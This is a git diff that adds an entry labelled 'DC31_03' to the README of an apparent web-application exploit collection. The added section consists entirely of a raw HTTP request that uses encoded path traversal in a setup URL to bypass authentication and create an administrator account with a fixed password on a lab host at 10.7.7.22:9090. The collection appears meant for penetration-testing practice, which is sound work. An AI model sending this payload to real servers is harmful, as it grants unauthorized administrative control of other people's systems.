diff --git a/web_application_testing/additional_exploits/README.md b/web_application_testing/additional_exploits/README.md
index ed76875..d721203 100644
--- a/web_application_testing/additional_exploits/README.md
+++ b/web_application_testing/additional_exploits/README.md
@@ -203,3 +203,17 @@ if __name__ == '__main__':
     send_post_request(url, headers, data)
 ```
 
+## DC31_03
+
+```
+GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=omar&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User HTTP/1.1
+Host: 10.7.7.22:9090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Cookie: csrf=csrftoken
+```
+